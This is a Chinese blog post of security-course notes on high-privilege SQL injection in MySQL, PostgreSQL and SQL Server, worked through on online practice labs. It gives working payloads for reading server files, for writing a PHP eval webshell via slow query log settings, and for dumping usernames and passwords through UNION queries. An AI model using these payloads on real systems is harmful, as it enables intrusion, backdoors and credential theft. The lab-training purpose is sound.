day25WEB攻防-通用漏洞&SQL读写注入&MYSQL&SqlServer&PostgreSQL

已于 2024-01-22 17:40:28 修改
阅读量1k 收藏 19
点赞数 30
分类专栏: 小迪安全-2022年 文章标签: sql mysql sqlserver
于 2024-01-15 13:05:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69583059/article/details/135587557
版权

目录

前言 

MYSQL-root高权限读写注入

 读取文件:

写入文件:

PostgreSQL-高权限读写注入

测列数:

测显位:

获取信息:

获取数据库名:

获取表名:

获取列名:

获取数据:

SqlServer-Sa高权限读写注入

案例:https://www.mozhe.cn/bug/detail/SXlYMWZhSm15QzM1OGpyV21BR1p2QT09bW96aGUmozhe 

测列数:

测显位:

获取信息:

获取表名;

获取列名:

获取数据:

 

前言 

Access无高权限注入点,只能猜解,还是暴力猜解

MYSQL,PostgreSQL,SqlServer高权限注入点可以升级读写执行等,高权限注入可以通过写入后门或者读取相关配置文件获取当前网站的相关权限,不需要通过一步一步猜解数据,当然这只是里理论,在实际环境中,可能会因为数据库的某些设置或者防护导致无法读写注入,如果能绕过当然是最好的,如果不能绕过那么我们只能乖乖的一步一步猜解

MYSQL-root高权限读写注入

 读取文件:

union select load_file('读取路径'),2,3 

写入文件:

union select  '写入信息',2,3 into outfile '写入路径'

路径获取:phpinfo,报错,字典等

无法写入:secure_file_priv突破  //限制读写路径  注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连接上对方数据库进行绕过

set global slow_query_log=1

set global slow_query_log_file='shell路径'

select '<? php eval($_GET[A] ?>' or SLEEP(11);

关于文件读取和写入请参考这篇文章:http://www.taodudu.cc/news/show-4259716.html?action=onClick

PostgreSQL-高权限读写注入

PostgreSQL的注入和MYSQL注入语句写法有些不一样,这里通过墨者学院在线靶场进行演示说明,靶场通往入口:https://www.mozhe.cn/bug/detail/86 

测列数:

order by 4

测显位:

and 1=2 union select 'null',null,null,null  //错误

and 1=2 union select null,'null',null,null //正常

and 1=2 union select null,null,'null',null  //正常

and 1=2 union select null,null,null,'null'  //错误

通过测试我们发现2,3位有显示

获取信息:

and 1=2 union select null,version(),null,null  //获取版本

and 1=2 union select null,current_user,null,null  //获取当前用户

and 1=2 union select null,current_database(),null,null  //获取当前数据库名 

获取数据库名:

and 1=2 union select null,string_agg(datname,',') ,null,null from pg_database

获取表名:

and 1=2 union select null,string_agg(tablename,',') ,null,null from pg_tables where schemaname='public'

获取列名:

and 1=2 union select null,string_agg(column_name,','),null,null from information_schema.columns where table_name='reg_users'

获取数据:

and 1=2 union select null,string_agg(name,',') ,string_agg(password,','),null from reg_users

判断是否高权限:获取dba用户(同样在DBA用户下,是可以进行文件读写的)

and 1=2 union select null,string_agg(username,','),null,null from pg_user where useruper is true 

查看是否和当前用户一致,如果是,说明当前用户是管理员用户,相当于MYSQL数据库的root用户 

关于PostgreSQL数据库文件读写注入这里就不说明了,请参考 :https://www.freebuf.com/articles/web

SqlServer-Sa高权限读写注入

案例:https://www.mozhe.cn/bug/detail/SXlYMWZhSm15QzM1OGpyV21BR1p2QT09bW96aGUmozhe 

测列数:

order by 4

and 1=2 union all select null,null,null,null

测显位:

and 1=2 union all select null,'null',null,null

and 1=2 union all select null,null,'null',null

获取信息:

@@version:获取版本信息

db_name():获取当前数据库名字

user,system_user,current_user,user _name:获取当前用户名

@@SERVERNAME获取服务器主机信息

and 1=2 union all select null,db_name(),null,null

获取表名;

and 1=2 union all select null,(select top 1 name from moze_db_v2.dbo.sysobjects where xtype='u'),null,null

and 1=2 union all select null,(select top 1 name from moze_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null

获取列名:

and 1=2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null

获取数据:

and 1=2 union all select null,username,password,null from manage

aozhan001
关注
  • 30
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL注入之postgresql注入及原理
afei001
04-27 1461
Postgresql简介 PostgreSQL是一个功能强大的开源数据库系统。经过长达15年以上的积极开发和不断改进,PostgreSQL已在可靠性、稳定性、数据一致性等获得了业内极高的声誉。目前PostgreSQL可以运行在所有主流操作系统上,包括Linux、Unix(AIX、BSD、HP-UX、SGI IRIX、Mac OS X、Solaris和Tru64)和Window...
mysql-sqlserver-postgresql-jar包.rar
04-26
连接mysql-sqlserver-postgresql所需要的-jar包
练习:SQL注入——PostgreSQL
m0_51322401的博客
02-01 1684
不同于mysql数据库的union select 1,2,3,4,该i数据库的使用null来替代,union select null,null,null,null,在中间输入之后同样使用and1=2来进行报错即使and 1=2 union select null,null,null,null。and 1=2 union select ‘null’,null,null,null 错误。and 1=2 union select null,null,null,‘null’ 错误。依次序使其测出显位。
SQL注入漏洞(postgresql注入
errorr0
07-08 7309
postgresql sql注入
小迪安全25WEB 攻防-通用漏洞&SQL 注入&MYSQL&MSSQL&PostgreSQL
weixin_73760178的博客
02-18 1046
id=2 and 1=2 union all select 1,(select username from manage),(select password from manage where username in ('admin_mz')),4 8、MD5解密。——令日志内容入知指定路径。
SQL注入&PostgreSQL&SQLserver&实战
weixin_54882883的博客
05-14 1114
知识点: SQL注入-PostgreSQL数据库 详细点: Access无高权限注入-只能猜解,还是暴力猜解 MYSQL,PostgreSQL,MSSQL高权限注入-可升级执行等 墨者PostgreSQL数据注入 流程还是一样的 首先是判断是否有注入点 and 1=2 报错性异常回显 存在注入点 字段判断 order by 4 当我们判断字段为5的时候异常回显了 所有我们判断他的字段有四个 那么我们这个PostgreSQL数据库注入就有一点不一样了 下面是进行位置回显注入
php-crud-admin:单个文件PHP脚本中用于MySQL,PostgreSQL或SQL Server的数据库管理界面
05-16
PHP-CRUD-ADMIN 单个文件PHP脚本中MySQL,PostgreSQL或SQL Server的数据库管理界面。要求PHP 7.0或更高版本,已启用用于MySQL,PgSQL或SqlSrv的PDO驱动程序安装这是一个文件应用程序! 在某个地方上传“ admin.php ...
SQL Server/PostgreSQL/MySQL模式迁移库- rebus-org/migr8
01-27
First you install the appropriate Migr8 package - if you're using SQL Server, you will probably Install-Package Migr8 -ProjectName YourApp and if you're using PostgreSQL, you be all Install-Package ...
支持MySQL、Oracle、SQL Server、PostgreSQL的代码生成工具
最新发布
06-10
一款代码生成工具,可自定义模板生成不同的代码,支持MySQL、Oracle、SQL Server、PostgreSQL
MySQL & PostgreSQL管道
01-27
sql allows you to pipe STDIN (hopefully containing SQL) to one or more pre-configured MySQL or PostgreSQL databases output comes out in \t-separated format, allowing further piping (e.g. works really ...
SQL手工注入漏洞测试(PostgreSQL数据库)-墨者
weoptions的博客
12-04 925
———靶场专栏———记录我的打靶过程
PostgreSQL数据库注入-墨者学院(SQL手工注入漏洞测试(PostgreSQL数据库))
T1ngSh0w的博客
09-06 1459
PostgreSQL数据库注入-墨者学院-SQL手工注入漏洞测试(PostgreSQL数据库)
25、WEB攻防——通用漏洞&SQL注入&MYSQL&MSSQL&PostgreSQL
qq_55202378的博客
12-31 1271
Access无高权限注入点——只能猜解,而且是暴力猜解;MYSQL,PostgreSQL,MSSQL(SQL server)高权限注入点——可升级(文件)、(命令)执行等。
PostgreSQL注入总结(待完成)
qq_39764475的博客
04-06 6526
简介 PostgreSQL 是一个免费的对象-关系数据库服务器(ORDBMS),在灵活的BSD许可证下发行。 PostgreSQL 开发者把它念作 post-gress-Q-L。 PostgreSQL 的 Slogan 是 “世界上最先进的开源关系型数据库”。 参考内容:PostgreSQL 10.1 手册 基本使用 1.createdb 命令创建数据库 createdb 是一个 SQL 命令 CREATE DATABASE 的封装。 createdb 命令语法格式如下: createdb [option.
SQL注入漏洞(postgresql之OOB带外注入
errorr0
07-13 1228
postgresql OOB带外
PostgreSQL 注入整理
瞎几把学
05-17 4626
PostgreSQL 注入整理 <br />5432端口<br />/*order by猜字段数*/<br />http://www.bug.cx/detail.php?id=236+order+by+26--<br />/*判断postgresql数据库*/<br />http://www.bug.cx/detail.php?id=236+and+1::int=1--<br />/*通过cast类型转换来暴postgresql信息*/<br />http://www.bug.cx/detail.php?i
Postgresql 防止sql注入执行方式,使用nodejs实现
一醉千秋的专栏
04-27 1863
1.不使用字符串拼接sql,直接编位置的sql带参数语句,例如: select gid as objectid,name,height,houseid,ST_AsGeoJson(geom) as geometry from changqing_polygon_house where height>$1 含有like的语句,用其他关键字~* 代替 ,还有其他的关键字。。。 sele...
postgresql数据库利用方式
Fly_鹏程万里
06-04 784
PostgreSQL 是一个自由的对象-关系数据库服务器(数据库管理系统),本文对于postgresql的使用及利用做个总结备份。测试系统:kali基本使用在root权限下修改数据库密码:service postgresql start #启动服务su postgres #切换到数据库用户下psql  postgres #进入数据库alter user postgres with password...
postgresql和sqlserver、mysql
05-19
PostgreSQL、SQL Server 和 MySQL 都是关系型数据库管理系统 (RDBMS)。 PostgreSQL 是一个免费的、开源的对象关系型数据库系统,它支持 SQL 和 ACID 事务。它是一个非常强大的数据库系统,支持复杂的查询和高级功能,如外部键、触发器和存储过程等。它的社区非常活跃,有许多第三方库和工具可供使用。 SQL Server 是由 Microsoft 开发的关系型数据库管理系统,它是商业软件,需要付费使用。它与 Windows 紧密集成,提供了许多高级功能,如分布式事务、数据分区、数据加密和高可用性等。它还支持非常大型的数据库,可以处理高并发和高负载的应用程序。 MySQL 是一个开源的关系型数据库管理系统,它支持 SQL 和 ACID 事务。它是一个非常流行的数据库系统,被广泛应用于 Web 应用程序和其他开源软件中。它具有高性能、高可靠性和易于使用的特点,支持主从复制和分区等高级功能。 总的来说,这三个数据库系统都非常强大和流行,具有各自的优点和适用场景。选择哪个数据库系统取决于你的具体需求和应用场景。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值